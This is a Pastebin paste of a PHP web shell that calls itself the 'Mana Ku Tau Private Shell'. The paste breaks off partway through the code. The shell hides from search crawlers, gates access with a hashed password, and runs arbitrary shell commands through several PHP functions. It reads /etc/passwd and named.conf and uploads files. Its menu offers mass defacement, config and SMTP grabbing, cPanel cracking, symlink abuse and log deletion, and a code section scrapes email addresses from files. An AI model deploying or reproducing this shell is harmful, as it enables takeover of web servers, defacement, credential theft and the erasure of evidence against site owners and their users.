API tools faq
paste
Guest User

Untitled

a guest
Jun 1st, 2018
911
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 88.29 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. $auth_pass = "9ac65ba3c9df0006a89113889e9c8e8b";
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21. header('HTTP/1.0 404 Not Found');
  22. exit;
  23. }
  24. }
  25.  
  26. function login_shell() {
  27. ?>
  28. <html>
  29. <head>
  30. <link rel="icon" href="http://seegrastreadores.com.br/mina.png" type="image/x-icon"/>
  31. <title>Mana Ku Tau Private Shell !!!</title>
  32. <style type="text/css">
  33. html {
  34. margin: 20px auto;
  35. background: #000000;
  36. color: cyan;
  37. text-align: center;
  38. }
  39. header {
  40. color: cyan;
  41. margin: 10px auto;
  42. }
  43. input[type=password] {
  44. width: 250px;
  45. height: 25px;
  46. color: red;
  47. background: #000000;
  48. border: black;
  49. padding: 5px;
  50. margin-left: 20px;
  51. text-align: center;
  52. }
  53. .kedip {
  54. -webkit-animation-name: blinker;
  55. -webkit-animation-duration: 3s;
  56. -webkit-animation-timing-function: linear;
  57. -webkit-animation-iteration-count: infinite;
  58.  
  59. -moz-animation-name: blinker;
  60. -moz-animation-duration: 2s;
  61. -moz-animation-timing-function: linear;
  62. -moz-animation-iteration-count: infinite;
  63.  
  64. animation-name: blinker;
  65. animation-duration: 1s;
  66. animation-timing-function: linear;
  67. animation-iteration-count: infinite;
  68. color: green;
  69. }
  70. @-moz-keyframes blinker {
  71. 0% { opacity: 1.0; }
  72. 50% { opacity: 0.0; }
  73. 100% { opacity: 1.0; }
  74. }
  75. @-webkit-keyframes blinker {
  76. 0% { opacity: 1.0; }
  77. 50% { opacity: 0.0; }
  78. 100% { opacity: 1.0; }
  79. }
  80. @keyframes blinker {
  81. 0% { opacity: 1.0; }
  82. 50% { opacity: 0.0; }
  83. 100% { opacity: 1.0; }
  84. }
  85. </style>
  86. </head>
  87. <script language='javascript'>
  88. if (document.all||document.getElementById){
  89. var thetitle=document.title
  90. document.title=''
  91. }
  92. var data="abcdefghijklmnopqrstuvwxyz";
  93. var done=1;
  94. function statusIn(text){
  95. decrypt(text,5,50);
  96. }
  97. function statusOut(){
  98. self.status='';
  99. done=1;
  100. }
  101. function decrypt(text, max, delay){
  102. if (done){
  103. done = 0;
  104. rantit(text, max, delay, 0, max);
  105. }
  106. }
  107. function rantit(text, runs_left, delay, charvar, max){
  108. if (!done){
  109. runs_left = runs_left - 1;
  110. var status = text.substring(0,charvar);
  111. for(var current_char = charvar; current_char < text.length; current_char++){
  112. status += data.charAt(Math.round(Math.random()*data.length));
  113. }
  114. document.title = status;
  115. var rerun = "rantit('" + text + "'," + runs_left + "," + delay + "," + charvar + "," + max + ");"
  116. var new_char = charvar + 1;
  117. var next_char = "rantit('" + text + "'," + max + "," + delay + "," + new_char + "," + max + ");"
  118. if(runs_left > 0){
  119. setTimeout(rerun, delay);
  120. }
  121. else{
  122. if (charvar < text.length){
  123. setTimeout(next_char, Math.round(delay*(charvar+3)/(charvar+1)));
  124. }
  125. else
  126. {
  127. done = 1;
  128. }
  129. }
  130. }
  131. }
  132. if (document.all||document.getElementById)
  133. statusIn(thetitle)
  134. </script>
  135. <center>
  136. <header>
  137. <pre>
  138.  
  139.  
  140.  
  141.  
  142.  
  143.  
  144.  
  145.  
  146.  
  147.  
  148. ,----------------, ,---------,
  149. ,-----------------------, ," ,"|
  150. ," ,"| ," ," |
  151. +-----------------------+ | ," ," |
  152. | .-----------------. | | +---------+ |
  153. | | | | | | -==----'| |
  154. | | I LOVE YOU! | | | | | |
  155. | | Bad command or | | |/----|`---= | |
  156. | | C:\>_ | | | ,/|==== ooo | ;
  157. | | | | | // |(((( [33]| ,"
  158. | `-----------------' |," .;'| |(((( | ,"
  159. +-----------------------+ ;; | | |," -Idiot BlackHat-
  160. /_)______________(_/ //' | +---------+
  161. ___________________________/___ `,
  162. / oooooooooooooooo .o. oooo /, \,"-----------
  163. / ==ooooooooooooooo==.o. ooo= // ,`\--{)B ,"
  164. /_==__==========__==_ooo__ooo=_/' /___________,"
  165.  
  166.  
  167.  
  168. <pre class='kedip'>
  169. __________ .___ .__
  170. \______ \ ________________ ____ __| _/____ | |
  171. | | _// __ \_ __ \__ \ / \ / __ |\__ \ | |
  172. | | \ ___/| | \// __ \| | \/ /_/ | / __ \| |__
  173. |______ /\___ >__| (____ /___| /\____ |(____ /____/
  174. \/ \/ \/ \/ \/ \/
  175. </pre></pre>
  176. </header>
  177. <form method="post">
  178. <input type="password" name="pass">
  179. </form>
  180. <?php
  181. exit;
  182. }
  183. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  184. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  185. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  186. else
  187. login_shell();
  188. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  189. @ob_clean();
  190. $file = $_GET['file'];
  191. header('Content-Description: File Transfer');
  192. header('Content-Type: application/octet-stream');
  193. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  194. header('Expires: 0');
  195. header('Cache-Control: must-revalidate');
  196. header('Pragma: public');
  197. header('Content-Length: ' . filesize($file));
  198. readfile($file);
  199. exit;
  200. }
  201. ?>
  202. <html>
  203. <head>
  204. <link rel="icon" href="http://seegrastreadores.com.br/natal2015/images/logo.jpeg" type="image/x-icon"/>
  205. <title>Mana Ku Tau Shell !!!</title>
  206. <meta name='author' content='berandal'>
  207. <meta charset="UTF-8">
  208. <style type='text/css'>
  209. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  210. html {
  211. background: #000000;
  212. color: #ffffff;
  213. font-family: 'Ubuntu';
  214. font-size: 13px;
  215. width: 100%;
  216. }
  217. li {
  218. display: inline;
  219. margin: 5px;
  220. padding: 5px;
  221. }
  222. table, th, td {
  223. border-collapse:collapse;
  224. font-family: Tahoma, Geneva, sans-serif;
  225. background: transparent;
  226. font-family: 'Ubuntu';
  227. font-size: 13px;
  228. }
  229. .table_home, .th_home, .td_home {
  230. border: 1px solid #ffffff;
  231. }
  232. .table_home td:hover {
  233. background: #635F5F;
  234. }
  235. th {
  236. padding: 10px;
  237. border-color: #BDBDBD;
  238. }
  239. a {
  240. color: #ffffff;
  241. text-decoration: none;
  242. }
  243. a:hover {
  244. color: cyan;
  245. text-decoration: underline;
  246. }
  247. b {
  248. color: gold;
  249. }
  250. input[type=text], input[type=password],input[type=submit] {
  251. background: transparent;
  252. color: #ffffff;
  253. border: 1px solid #ffffff;
  254. margin: 5px auto;
  255. padding-left: 5px;
  256. font-family: 'Ubuntu';
  257. font-size: 13px;
  258. }
  259. textarea {
  260. border: 1px solid #ffffff;
  261. width: 100%;
  262. height: 400px;
  263. padding-left: 5px;
  264. margin: 10px auto;
  265. resize: none;
  266. background: transparent;
  267. color: #ffffff;
  268. font-family: 'Ubuntu';
  269. font-size: 13px;
  270. }
  271. select {
  272. width: 152px;
  273. background: #000000;
  274. color: cyan;
  275. border: 1px solid #ffffff;
  276. margin: 5px auto;
  277. padding-left: 5px;
  278. font-family: 'Ubuntu';
  279. font-size: 13px;
  280. }
  281. option:hover {
  282. background: cyan;
  283. color: #000000;
  284. }
  285. .muter {
  286. onmousedown:stop;
  287. animation-name: rotate ;
  288. animation-duration: 5s;
  289. animation-play-state: running;
  290. animation-timing-function: linear;
  291. animation-iteration-count: infinite;
  292. opacity: 1.0;filter: alpha(opacity=50);}
  293.  
  294. .muter:hover {opacity: 1.0;filter: alpha(opacity=100);}
  295.  
  296. @keyframes rotate{
  297. 10% {transform:rotateY(36deg)}
  298. 20% {transform:rotateY(72deg)}
  299. 30% {transform:rotateY(108deg)}
  300. 40% {transform:rotateY(144deg)}
  301. 50% {transform:rotateY(180deg)}
  302. 60% {transform:rotateY(216deg)}
  303. 70% {transform:rotateY(252deg)}
  304. 80% {transform:rotateY(288deg)}
  305. 90% {transform:rotateY(324deg)}
  306. 100% {transform:rotateY(360deg)}
  307. }
  308. .phpinfo table{width:100%;padding:0 0 0 0;}
  309. .phpinfo td{background:black;color:#cccccc;padding:6px 8px;;}
  310. .phpinfo th, th{background:#191919;border-bottom:1px solid #333333;font-weight:normal;}
  311. .phpinfo h2, .phpinfo h2 a{text-align:center;font-size:16px;padding:0;margin:30px 0 0 0;background:#222222;padding:4px 0;}
  312. </style>
  313. </head>
  314. <script language='javascript'>
  315. if (document.all||document.getElementById){
  316. var thetitle=document.title
  317. document.title=''
  318. }
  319. var data="abcdefghijklmnopqrstuvwxyz";
  320. var done=1;
  321. function statusIn(text){
  322. decrypt(text,5,50);
  323. }
  324. function statusOut(){
  325. self.status='';
  326. done=1;
  327. }
  328. function decrypt(text, max, delay){
  329. if (done){
  330. done = 0;
  331. rantit(text, max, delay, 0, max);
  332. }
  333. }
  334. function rantit(text, runs_left, delay, charvar, max){
  335. if (!done){
  336. runs_left = runs_left - 1;
  337. var status = text.substring(0,charvar);
  338. for(var current_char = charvar; current_char < text.length; current_char++){
  339. status += data.charAt(Math.round(Math.random()*data.length));
  340. }
  341. document.title = status;
  342. var rerun = "rantit('" + text + "'," + runs_left + "," + delay + "," + charvar + "," + max + ");"
  343. var new_char = charvar + 1;
  344. var next_char = "rantit('" + text + "'," + max + "," + delay + "," + new_char + "," + max + ");"
  345. if(runs_left > 0){
  346. setTimeout(rerun, delay);
  347. }
  348. else{
  349. if (charvar < text.length){
  350. setTimeout(next_char, Math.round(delay*(charvar+3)/(charvar+1)));
  351. }
  352. else
  353. {
  354. done = 1;
  355. }
  356. }
  357. }
  358. }
  359. if (document.all||document.getElementById)
  360. statusIn(thetitle)
  361. </script>
  362. <?php
  363. function w($dir,$perm) {
  364. if(!is_writable($dir)) {
  365. return "<font color=red>".$perm."</font>";
  366. } else {
  367. return "<font color=cyan>".$perm."</font>";
  368. }
  369. }
  370. function r($dir,$perm) {
  371. if(!is_readable($dir)) {
  372. return "<font color=red>".$perm."</font>";
  373. } else {
  374. return "<font color=cyan>".$perm."</font>";
  375. }
  376. }
  377. function exe($cmd) {
  378. if(function_exists('system')) {
  379. @ob_start();
  380. @system($cmd);
  381. $buff = @ob_get_contents();
  382. @ob_end_clean();
  383. return $buff;
  384. } elseif(function_exists('exec')) {
  385. @exec($cmd,$results);
  386. $buff = "";
  387. foreach($results as $result) {
  388. $buff .= $result;
  389. } return $buff;
  390. } elseif(function_exists('passthru')) {
  391. @ob_start();
  392. @passthru($cmd);
  393. $buff = @ob_get_contents();
  394. @ob_end_clean();
  395. return $buff;
  396. } elseif(function_exists('shell_exec')) {
  397. $buff = @shell_exec($cmd);
  398. return $buff;
  399. }
  400. }
  401. function perms($file){
  402. $perms = fileperms($file);
  403. if (($perms & 0xC000) == 0xC000) {
  404. // Socket
  405. $info = 's';
  406. } elseif (($perms & 0xA000) == 0xA000) {
  407. // Symbolic Link
  408. $info = 'l';
  409. } elseif (($perms & 0x8000) == 0x8000) {
  410. // Regular
  411. $info = '-';
  412. } elseif (($perms & 0x6000) == 0x6000) {
  413. // Block special
  414. $info = 'b';
  415. } elseif (($perms & 0x4000) == 0x4000) {
  416. // Directory
  417. $info = 'd';
  418. } elseif (($perms & 0x2000) == 0x2000) {
  419. // Character special
  420. $info = 'c';
  421. } elseif (($perms & 0x1000) == 0x1000) {
  422. // FIFO pipe
  423. $info = 'p';
  424. } else {
  425. // Unknown
  426. $info = 'u';
  427. }
  428. // Owner
  429. $info .= (($perms & 0x0100) ? 'r' : '-');
  430. $info .= (($perms & 0x0080) ? 'w' : '-');
  431. $info .= (($perms & 0x0040) ?
  432. (($perms & 0x0800) ? 's' : 'x' ) :
  433. (($perms & 0x0800) ? 'S' : '-'));
  434. // Group
  435. $info .= (($perms & 0x0020) ? 'r' : '-');
  436. $info .= (($perms & 0x0010) ? 'w' : '-');
  437. $info .= (($perms & 0x0008) ?
  438. (($perms & 0x0400) ? 's' : 'x' ) :
  439. (($perms & 0x0400) ? 'S' : '-'));
  440. // World
  441. $info .= (($perms & 0x0004) ? 'r' : '-');
  442. $info .= (($perms & 0x0002) ? 'w' : '-');
  443. $info .= (($perms & 0x0001) ?
  444. (($perms & 0x0200) ? 't' : 'x' ) :
  445. (($perms & 0x0200) ? 'T' : '-'));
  446. return $info;
  447. }
  448. function hdd($s) {
  449. if($s >= 1073741824)
  450. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  451. elseif($s >= 1048576)
  452. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  453. elseif($s >= 1024)
  454. return sprintf('%1.2f',$s / 1024 ) .' KB';
  455. else
  456. return $s .' B';
  457. }
  458. function ambilKata($param, $kata1, $kata2){
  459. if(strpos($param, $kata1) === FALSE) return FALSE;
  460. if(strpos($param, $kata2) === FALSE) return FALSE;
  461. $start = strpos($param, $kata1) + strlen($kata1);
  462. $end = strpos($param, $kata2, $start);
  463. $return = substr($param, $start, $end - $start);
  464. return $return;
  465. }
  466. function getsource($url) {
  467. $curl = curl_init($url);
  468. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  469. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  470. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  471. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  472. $content = curl_exec($curl);
  473. curl_close($curl);
  474. return $content;
  475. }
  476. function bing($dork) {
  477. $npage = 1;
  478. $npages = 30000;
  479. $allLinks = array();
  480. $lll = array();
  481. while($npage <= $npages) {
  482. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  483. if($x) {
  484. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  485. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  486. $npage = $npage + 10;
  487. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  488. } else break;
  489. }
  490. $URLs = array();
  491. foreach($allLinks as $url){
  492. $exp = explode("/", $url);
  493. $URLs[] = $exp[2];
  494. }
  495. $array = array_filter($URLs);
  496. $array = array_unique($array);
  497. $sss = count(array_unique($array));
  498. foreach($array as $domain) {
  499. echo $domain."\n";
  500. }
  501. }
  502. function reverse($url) {
  503. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  504. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  505. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  506. curl_setopt($ch, CURLOPT_HEADER, 0);
  507. curl_setopt($ch, CURLOPT_POST, 1);
  508. $resp = curl_exec($ch);
  509. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  510. $array = explode(",,", $resp);
  511. unset($array[0]);
  512. foreach($array as $lnk) {
  513. $lnk = "http://$lnk";
  514. $lnk = str_replace(",", "", $lnk);
  515. echo $lnk."\n";
  516. ob_flush();
  517. flush();
  518. }
  519. curl_close($ch);
  520. }
  521. if(get_magic_quotes_gpc()) {
  522. function berandal_ss($array) {
  523. return is_array($array) ? array_map('berandal_ss', $array) : stripslashes($array);
  524. }
  525. $_POST = berandal_ss($_POST);
  526. $_COOKIE = berandal_ss($_COOKIE);
  527. }
  528.  
  529. if(isset($_GET['dir'])) {
  530. $dir = $_GET['dir'];
  531. chdir($dir);
  532. } else {
  533. $dir = getcwd();
  534. }
  535. $kernel = php_uname();
  536. $admin_id=$_SERVER['SERVER_ADMIN'];
  537. $software = getenv("SERVER_SOFTWARE");
  538. $d0mains = @file("/etc/named.conf");
  539. $users=@file('/etc/passwd');
  540. if($d0mains)
  541. {
  542. $count;
  543. foreach($d0mains as $d0main)
  544. {
  545. if(@ereg("zone",$d0main))
  546. {
  547. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  548. flush();
  549. if(strlen(trim($domains[1][0])) > 2)
  550. {
  551. flush();
  552. $count++;
  553. }
  554. }
  555. }
  556. }
  557. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  558. $dir = str_replace("\\","/",$dir);
  559. $scdir = explode("/", $dir);
  560. $freespace = hdd(disk_free_space("/"));
  561. $total = hdd(disk_total_space("/"));
  562. $used = $total - $freespace;
  563. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=cyan>OFF</font>";
  564. $ds = @ini_get("disable_functions");
  565. $mysql = (function_exists('mysql_connect')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  566. $curl = (function_exists('curl_version')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  567. $wget = (exe('wget --help')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  568. $perl = (exe('perl --help')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  569. $python = (exe('python --help')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  570. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=cyan>NONE</font>";
  571. if(!function_exists('posix_getegid')) {
  572. $user = @get_current_user();
  573. $uid = @getmyuid();
  574. $gid = @getmygid();
  575. $group = "?";
  576. } else {
  577. $uid = @posix_getpwuid(posix_geteuid());
  578. $gid = @posix_getgrgid(posix_getegid());
  579. $user = $uid['name'];
  580. $uid = $uid['uid'];
  581. $group = $gid['name'];
  582. $gid = $gid['gid'];
  583. }
  584. echo "<img src='http://seegrastreadores.com.br/natal2015/images/logo.jpeg' width='200px' height='200px' class='muter' style='float: left;'>";
  585. echo "System: <font color=cyan>".$kernel."</font><br>";
  586. echo "User: <font color=cyan>".$user."</font> (".$uid.") Group: <font color=cyan>".$group."</font> (".$gid.")<br>";
  587. echo "Server IP: <font color=cyan>".$ip."</font> | Your IP: <font color=cyan>".$_SERVER['REMOTE_ADDR']."</font><br>";
  588. echo "PHP Version : ".phpversion()." <font color='white'> on</font> ".php_sapi_name()." <font class='asu'>[<a href='?dir=$dir&do=phinfo'>PHP Info</a>]</font><br>";
  589. echo "Admin : <font color=cyan>".$admin_id."</font> | Websites: <font color=cyan>$count</font> Domains<br>";
  590. echo "HDD: <font color=cyan>$used</font> / <font color=cyan>$total</font> ( Free: <font color=cyan>$freespace</font> )<br>";
  591. echo "Safe Mode: $sm<br>";
  592. echo "Disable Functions: $show_ds<br>";
  593. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  594. echo "Current DIR: ";
  595. foreach($scdir as $c_dir => $cdir) {
  596. echo "<a href='?dir=";
  597. for($i = 0; $i <= $c_dir; $i++) {
  598. echo $scdir[$i];
  599. if($i != $c_dir) {
  600. echo "/";
  601. }
  602. }
  603. echo "'>$cdir</a>/";
  604. }
  605. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  606. echo "<br><br><br>";
  607. echo "<hr>";
  608. echo "<center>";
  609. echo "<ul>";
  610. echo "<li><font color='cyan'>[</font> <a href='?'>Home</a> <font color='cyan'>]</font></li>";
  611. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=upload'>Upload</a> <font color='cyan'>]</font></li>";
  612. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=cmd'>Command</a> <font color='cyan'>]</font></li>";
  613. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> <font color='cyan'>]</font></li>";
  614. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&config=grabber'>Config</a> <font color='cyan'>]</font></li>";
  615. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=jumping'>Jumping</a> <font color='cyan'>]</font></li>";
  616. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=symlink'>Symlink</a> <font color='cyan'>]</font></li>";
  617. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> <font color='cyan'>]</font></li>";
  618. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> <font color='cyan'>]</font></li><br>";
  619. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=loghunter'>LogHunter</a> <font color='cyan'>]</font></li>";
  620. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=zoneh'>Zone-H</a> <font color='cyan'>]</font></li>";
  621. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=cgi'>CGI Telnet</a> <font color='cyan'>]</font></li>";
  622. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=adminer'>Adminer</a> <font color='cyan'>]</font></li>";
  623. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=csrf'>CSRF</a> <font color='cyan'>]</font></li>";
  624. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=fake_root'>Fake Root</a> <font color='cyan'>]</font></li>";
  625. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> <font color='cyan'>]</font></li>";
  626. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&delete=logs'>Delete Logs</a> <font color='cyan'>]</font></li>";
  627. echo "<li><font color='cyan'>[</font> <a style='color: red;' href='?logout=true'>Logout</a> <font color='cyan'>]</font></li>";
  628. echo "</ul>";
  629. echo "</center>";
  630. echo "<hr>";
  631. if($_GET['logout'] == true) {
  632. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  633. echo "<script>window.location='?';</script>";
  634. } elseif($_GET['do'] == 'upload') {
  635. echo "<center>";
  636. if($_POST['upload']) {
  637. if($_POST['tipe_upload'] == 'biasa') {
  638. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  639. $act = "<font color=cyan>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  640. } else {
  641. $act = "<font color=red>failed to upload file</font>";
  642. }
  643. } else {
  644. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  645. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  646. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  647. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  648. $act = "<font color=cyan>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  649. } else {
  650. $act = "<font color=red>failed to upload file</font>";
  651. }
  652. } else {
  653. $act = "<font color=red>failed to upload file</font>";
  654. }
  655. }
  656. }
  657. echo "Upload File:
  658. <form method='post' enctype='multipart/form-data'>
  659. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  660. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  661. <input type='file' name='ix_file'>
  662. <input type='submit' value='upload' name='upload'>
  663. </form>";
  664. echo $act;
  665. echo "</center>";
  666. } elseif($_GET['do'] == 'cmd') {
  667. echo "<form method='post'>
  668. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  669. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  670. </form>";
  671. if($_POST['do_cmd']) {
  672. echo "<pre>".exe($_POST['cmd'])."</pre>";
  673. }
  674. } elseif($_GET['do'] == 'mass_deface') {
  675. function sabun_massal($dir,$namafile,$isi_script) {
  676. if(is_writable($dir)) {
  677. $dira = scandir($dir);
  678. foreach($dira as $dirb) {
  679. $dirc = "$dir/$dirb";
  680. $lokasi = $dirc.'/'.$namafile;
  681. if($dirb === '.') {
  682. file_put_contents($lokasi, $isi_script);
  683. } elseif($dirb === '..') {
  684. file_put_contents($lokasi, $isi_script);
  685. } else {
  686. if(is_dir($dirc)) {
  687. if(is_writable($dirc)) {
  688. echo "[<font color=cyan>DONE</font>] $lokasi<br>";
  689. file_put_contents($lokasi, $isi_script);
  690. $berandal = sabun_massal($dirc,$namafile,$isi_script);
  691. }
  692. }
  693. }
  694. }
  695. }
  696. }
  697. function sabun_biasa($dir,$namafile,$isi_script) {
  698. if(is_writable($dir)) {
  699. $dira = scandir($dir);
  700. foreach($dira as $dirb) {
  701. $dirc = "$dir/$dirb";
  702. $lokasi = $dirc.'/'.$namafile;
  703. if($dirb === '.') {
  704. file_put_contents($lokasi, $isi_script);
  705. } elseif($dirb === '..') {
  706. file_put_contents($lokasi, $isi_script);
  707. } else {
  708. if(is_dir($dirc)) {
  709. if(is_writable($dirc)) {
  710. echo "[<font color=cyan>DONE</font>] $dirb/$namafile<br>";
  711. file_put_contents($lokasi, $isi_script);
  712. }
  713. }
  714. }
  715. }
  716. }
  717. }
  718. if($_POST['start']) {
  719. if($_POST['tipe_sabun'] == 'mahal') {
  720. echo "<div style='margin: 5px auto; padding: 5px'>";
  721. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  722. echo "</div>";
  723. } elseif($_POST['tipe_sabun'] == 'murah') {
  724. echo "<div style='margin: 5px auto; padding: 5px'>";
  725. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  726. echo "</div>";
  727. }
  728. } else {
  729. echo "<center>";
  730. echo "<form method='post'>
  731. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  732. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  733. <font style='text-decoration: underline;'>Folder:</font><br>
  734. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  735. <font style='text-decoration: underline;'>Filename:</font><br>
  736. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  737. <font style='text-decoration: underline;'>Index File:</font><br>
  738. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Mana Ku Tau</textarea><br>
  739. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  740. </form></center>";
  741. }
  742. }
  743. elseif($_GET['do'] == 'loghunter')
  744. {
  745. echo '<center><h1>Log Hunter</h1>';
  746. echo "<form action=\"\" method=\"post\">\n";
  747. ?><br>Dir :<input type="text" value="<?=getcwd();?>" style='border-color=white;' name="shc_dir"><?php
  748. echo "<input type=\"submit\" style='border-color=white;' name=\"submit\" class=\"kotak\" value=\"Scan!\"/>\n";
  749. echo "</form>\n";
  750. echo "<pre style=\"text-align: left;\">\n";
  751. error_reporting(0);
  752. /*
  753. +--------------------------------------------+
  754. Name : Log Hunter (Grab Email)
  755. Date : 26/03/2016 05:53 PM
  756. Link : http://facebook.com/rafi.izudin
  757. Link : http://pastebin.com
  758. Author : Shor7cut
  759. +--------------------------------------------+
  760. Recoder : Berandal
  761. Link : http://twitter.com
  762. Link : http://pastebin.com
  763. +--------------------------------------------+
  764. */
  765.  
  766.  
  767. if($_POST['submit']){
  768. function tampilkan($shcdirs){
  769. foreach(scandir($shcdirs) as $shc)
  770. {
  771. if($shc!='.' && $shc!='..')
  772. {
  773. $shc = $shcdirs.DIRECTORY_SEPARATOR.$shc;
  774. if( !is_dir($shc) && !eregi("css", $shc) ){
  775.  
  776. $fgt = file_get_contents($shc);
  777. $ifgt = exif_read_data($shc);
  778. $jembut = "COMPUTED";
  779. $taik = "UserComment";
  780. $shcm = "/mail['(']/";
  781. if($ifgt[$jembut][$taik]){
  782. echo "[<font color=#00FFD0>Stegano</font>] <font color=#2196F3>".$shc."</font><br>";
  783. }
  784. preg_match_all('#[A-Z0-9a-z._%+-]+@[A-Za-z0-9.+-]+#',$fgt,$cocok);
  785. $hcs = "/base64_decode/";
  786. $exif = "/exif_read_data/";
  787. preg_match($shcm, addslashes($fgt), $mailshc);
  788. preg_match($hcs, addslashes($fgt), $shcmar);
  789. preg_match($exif, addslashes($fgt), $shcxif);
  790. if(eregi('HTTP Cookie File', $fgt) || eregi('PHP Warning:', $fgt) ){
  791. }
  792. if(eregi('tmp_name', $fgt)){
  793. echo "[<font color=#FAFF14>Uploader</font>] <font color=#2196F3>".$shc."</font><br>";
  794. }
  795. if($shcmar[0]){
  796. echo "[<font color=#FF3D00>Base64</font>] <font color=#2196F3>".$shc."</font><br>";
  797. }
  798. if($mailshc[0]){
  799. echo "[<font color=#E6004E>MailFunc</font>] <font color=#2196F3>".$shc."</font><br>";
  800. }
  801. if($shcxif[0]){
  802. echo "[<font color=#00FFD0>Stegano</font>] <font color=#2196F3>".$shc."</font> </font><font color=red>{Manual Check}</font><br>";
  803. }
  804. if(eregi("js", $shc)){
  805. echo "[<font color=red>Javascript</font>] <font color=#2196F3>".$shc."</font> { <a href=http://www.unphp.net target=_blank>CheckJS</a> }<br>";
  806. }
  807. if($cocok[0]){
  808. foreach ($cocok[0] as $key => $shcmail) {
  809. if (filter_var($shcmail, FILTER_VALIDATE_EMAIL)) {
